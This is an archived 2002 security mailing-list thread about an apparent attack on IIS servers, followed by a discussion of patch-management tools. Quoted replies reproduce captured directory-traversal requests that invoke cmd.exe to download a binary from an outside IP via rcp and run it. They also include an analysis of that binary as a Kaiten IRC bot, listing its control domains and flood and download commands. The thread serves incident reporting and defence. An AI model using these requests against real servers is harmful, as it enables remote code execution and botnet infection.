|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: David LeBlanc (dleblanc_at_microsoft.com)
Date: Thu Sep 26 2002 - 15:24:09 CDT
If you want something that automatically installs only patches you
approve, take a look at
http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp
It might help you in your environment.
> -----Original Message-----
> From: zeno [mailto:bugtraq
cgisecurity.net]
> Sent: Tuesday, September 24, 2002 2:08 PM
> To: John Campbell
> Cc: incidentssecurityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
> >
> > Windows Update from you-know-who actually does what you
> describe. I'd
> > always been leery of it, but tried it out recently when
> setting up a
> > W2K test server, and it performed as advertised. It did
> take several
> > iterations to get everything updated, owing to various dependencies.
>
> When I used windows update it downloaded the patches but
> didn't install them. I had to manually go through each one.
> While this isn't a big deal I am looking for something 100
> percent automated with install of the patches. Perhaps I'm
> missing something I deal mostly with unix.
>
> - zeno
>
>
> >
> > Regards,
> >
> > John Campbell, CISSP, GCWN
> > Information Security Engineer
> > Washington School Information Processing Cooperative
> > (WSIPC)
> > Everett, Washington, USA
> >
> > -----Original Message-----
> > From: zeno [mailto:bugtraqcgisecurity.net]
> > Sent: Tuesday, September 24, 2002 11:29 AM
> > To: Mark Challender
> > Cc: 'pjesec.dk'; incidentssecurityfocus.com
> > Subject: Re: new IIS worm? (rcp lsass.exe)
> >
> >
> > >
> > > Hardening of IIS with the tools available at Microsoft and using
> > > URLSCAN with the EXE blocking on will stop these attacks.
> > >
> > > Patch, patch, patch, recheck the patches and use URLSCAN!
> >
> > Does anyone know of a gui windows tool that scans your system and
> > provides you with a list of needed patches, and then allows you to
> > select, and have it autodownload and install them? I can't seem to
> > find one (needed mostly for iis).
> >
> > - zenocgisecurity.com
> >
> >
> >
> > >
> > > Mark Challender
> > > Network Administrator
> > >
> > > ==================
> > > Veni, Vidi, Geeki
> > > ==================
> > >
> > >
> > > -----Original Message-----
> > > From: pjesec.dk [mailto:pjesec.dk]
> > > Sent: Monday, September 23, 2002 3:27 AM
> > > To: incidentssecurityfocus.com
> > > Subject: Re: new IIS worm? (rcp lsass.exe)
> > >
> > >
> > >
> > > Christian Mock:
> > >
> > > >Then it seems to go after the web servers, sending the following:
> > >
> > > >GET
> > >
> /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
> > > as
> > > s.exe+
> > > .
> > > HTTP/1.0..
> > >
> > > >and
> > >
> > > >GET
> /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
> > >
> > > >I've been able to get hold of that lsass.exe binary
> (9728 bytes),
> > > >but
> >
> > > >I lack the skills to analyze it; I'll happily mail it to anybody
> > > >who
> > > >asks.
> > >
> > >
> > > We have seen this attack from 4 different sources since Sept. 16,
> > > and
> > > have informed the owner of 64.21.95.7 and downloaded the
> lsass.exe for
> >
> > > investigation.
> > >
> > > Based on the attack rate this is most likely a scripted or manual
> > > attack, not a worm.
> > >
> > > Judging from the embedded string in this compressed binary it
> > > appears to be an IRC bot based on the kaiten.c code written by
> > > contemefnet, the author of the Slapper worm :
> > >
> > > Kaiten Win32 API version 2002 by contemefnet
> > >
> > > The binary contains these domainnames, most likeky IRC
> servers used
> > > for controlling the bot:
> > >
> > > telsa5.mine.nu (Korea)
> > > irc.logicfive.net (Taiwan)
> > > moncredo.shacknet.nu (USA)
> > > telsacredo.shacknet.nu (USA)
> > > lar.ath.cx (Taiwan)
> > >
> > > The program accepts commands to make various DOS attacks
> or download
> > > new version or executables with http:
> > >
> > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> > > NOTICE %s :NICK <nick> = Changes the nick of the
> > client
> > > NOTICE %s :DISABLE <pass> = Disables all
> packeting from
> > this
> > > client
> > > NOTICE %s :ENABLE <pass> = Enables all
> packeting from
> > this
> > > client
> > > NOTICE %s :UPDATE <http address> = Downloads a
> file off the
> > web and
> > > updates the client
> > > NOTICE %s :RUN <http address> = Downloads a
> file off the
> > web and
> > > runs it
> > > NOTICE %s :GET <http address> = Downloads a
> file off the
> > web
> > > NOTICE %s :ADDSERVER <server> = Adds a server
> to the list
> > > NOTICE %s :DELSERVER <server> = Deletes a
> server from the
> > list
> > > NOTICE %s :LISTSERVERS = Lists server
> on the list
> > > NOTICE %s :KILL = Kills the client
> > > NOTICE %s :VERSION = Requests
> version of client
> > > NOTICE %s :HELP = Displays this
> > >
> > >
> > > There seems also to be a default account and password in
> the german
> > > language included in this specific version of Kaiten.
> > >
> > > The IIS attack that tries to inject this Trojan usually
> has another
> > > URL with "CONNECT chat.vtm.be:6667". This is an attempt
> to proxy an
> > > connection to port 6667(IRC) on chat.vtm.be.
> > >
> > >
> > >
> > > Peter Jelver
> > > ...
> > >
> > > eSec A/S
> > >
> > > http://www.esec.dk
> > >
> ......................................................................
> > > ......
> > > .
> > >
> > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A
> 128F D85C A7D7
> > >
> > >
> > >
> > >
> > >
> > >
> --------------------------------------------------------------------
> > > --
> > > ------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management
> > > and tracking system please see: http://aris.securityfocus.com
> > >
> > >
> --------------------------------------------------------------------
> > > --
> > > ------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management
> > > and tracking system please see: http://aris.securityfocus.com
> > >
> > >
> >
> >
> >
> ----------------------------------------------------------------------
> > --
> > ----
> > This list is provided by the SecurityFocus ARIS analyzer
> service. For
> > more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
> >
> >
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus ARIS analyzer
> service. For more information on this free incident handling,
> management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]